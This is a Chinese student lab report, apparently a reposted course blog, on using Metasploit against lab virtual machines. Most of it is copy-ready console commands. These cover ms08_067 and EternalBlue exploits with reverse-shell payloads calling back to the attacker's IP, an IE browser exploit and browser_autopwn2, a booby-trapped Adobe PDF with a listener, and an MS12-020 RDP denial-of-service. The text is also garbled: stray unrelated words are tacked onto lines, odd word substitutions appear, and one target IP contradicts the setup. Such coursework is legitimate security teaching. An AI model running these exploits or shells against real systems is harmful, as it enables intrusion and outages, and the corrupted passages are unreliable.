2018-2019 20165226 Exp5 MSF基础应用

时间 2019-12-07

标签 exp5 exp msf 基础应用繁體版

原文原文链接

2018-2019 20165226 Exp5 MSF基础应用

1、实验内容说明及基础问题回答

一、实验内容
本实践目标是掌握metasploit的基本应用方式，重点经常使用的三种攻击方式的思路。具体须要完成：
（1）一个主动攻击实践，如ms08_067; （1分）浏览器

（2）一个针对浏览器的攻击，如ms11_050；（1分）安全

（3）一个针对客户端的攻击，如Adobe；（1分）服务器

（4）成功应用任何一个辅助模块。（0.5分）tcp

二、基础问题回答
（1）用本身的话解释什么是 exploit , payload , encode.编码

exploit
渗透攻击模块，利用系统服务应用中的漏洞取得权限
payload
一段代码，用于渗透以后在目标主机上执行
encode
用来对payload进行编码，主要是为了不“坏字符”和作到免杀

返回目录3d

2、实验过程

攻击机kali——172.30.2.47
靶机：①WinXP——172.30.6.172②win2000——172.30.5.55

Task1 主动攻击实践

ms08_067

在攻击机kali输入msfconsole进入控制台，依次输入如下指令：

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show payloads

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

msf exploit(ms08_067_netapi) > set LHOST 172.30.2.47 //攻击机ip

msf exploit(ms08_067_netapi) > set LPORT 5226//攻击端口

msf exploit(ms08_067_netapi) > set RHOST 172.30.6.172 //靶机ip，特定漏洞端口已经固定

msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型，匹配度较高

msf exploit(ms08_067_netapi) > exploit //攻击

结果出现没法建立会话界面
查看targets，与本机做对比
经过网上查找资料，发现xp中文版本打过补丁，因而换了一台win2000的，攻击成功
输入ipconfig/all，获取相关的MAC地址、IP地址、子网掩码、网关地址以及DNS

ms17_010

攻击：kali
靶机：①win2000②winxp③win2008

进入msfconsole
输入如下指令

search ms17-010 #搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue    #选择漏洞
show payloads   #查看可用攻击载荷
set payload windows/x64/meterpreter/reverse_tcp #选择攻击载荷
options

再输入如下指令：

set RHOST 172.30.2.111 #设置攻击ip
set LHOST 172.30.2.47   #设置监听主机
set LPORT 5226  #设置监听端口

失败
尝试更换虚拟机，终于，成功

Task2 针对浏览器的攻击

攻击机kali——172.30.2.47
靶机：①Win2000②win2007

ms11_050

在攻击机kali输入msfconsole进入控制台，依次输入如下指令：

msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.2.47 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5226 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5226lxs //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

在浏览器输入http://172.30.2.47:8080/5226lxs，IE没法访问
设置浏览器的安全级别以下
仍然不行，从新换一台虚拟机
在设置Internet选项后还是会出现IE浏览器的错误

browser_autopwn

换一个漏洞实施browser_autopwn模块
- 攻击机里进入msfconsole，而后分别输入

use auxiliary/server/browser_autopwn2

set SRVHOST 172.30.2.47

set URIPATH auto

show options

开始攻击，能够看到msf在不停的尝试不一样的payload
尝试成功，输出了可被访问的URLhttp：//172.30.2.47:8080/auto并启动服务器
失败again

Task3 对客户端的攻击，如Adobe

在攻击机kali输入msfconsole进入控制台，依次输入如下指令：

msf > use windows/fileformat/adobe_cooltype_sing

msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp //tcp反向回连

msf exploit(adobe_cooltype_sing) > set LHOST 172.30.2.47 //攻击机ip

msf exploit(adobe_cooltype_sing) > set LPORT 5226//攻击端口

msf exploit(adobe_cooltype_sing) > set FILENAME 20165226.pdf //设置生成pdf文件的名字

msf exploit(adobe_cooltype_sing) > exploit //攻击

将生成的pdf文件拷贝到靶机上
在kali上输入back退出当前模块，进入监听模块，输入如下命令：

msf > use exploit/multi/handler //进入监听模块

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向链接

msf exploit(handler) > set LHOST 172.30.2.47 //攻击机ip

msf exploit(handler) > set LPORT 5226 //攻击端口固定

msf exploit(handler) > exploit

在靶机上打开20165226.pdf文件
攻击机显示攻击成功
靶机关闭PDF文件则失去权限

Task4 成功应用auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块（惟一）

攻击：kali
靶机：win2008

使用命令show auxiliary查看全部的辅助模块
使用MS12-020(CVE-2012-0002)蓝屏攻击
进入msfconsole
输入如下指令

search ms12-020 #搜索漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids    #使用漏洞
options #查看配置信息
set RHOST 172.30.2.47 #设置攻击IP
exploit #开始攻击

攻击成功

返回目录

3、问题与思考

问题1：在进行ms08_067_netapi攻击时出现如下状况
问题1解决方案：
- 首先查看targets
- 换另外一台虚拟机，再次运行，攻击成功

返回目录

4、实验总结

本次实验学会了如何搜索漏洞，并在现有的漏洞环境下，尝试利用漏洞进行直接或间接主动攻击客户端。在整个过程当中，其实找适合的虚拟机特别关键，整个过程耗费的时间大量集中在尝试不一样虚拟机使其得以被攻击。不乏看出，打过补丁的虚拟机其抗攻击能力更强，这也提醒咱们应时常更新配置。

返回目录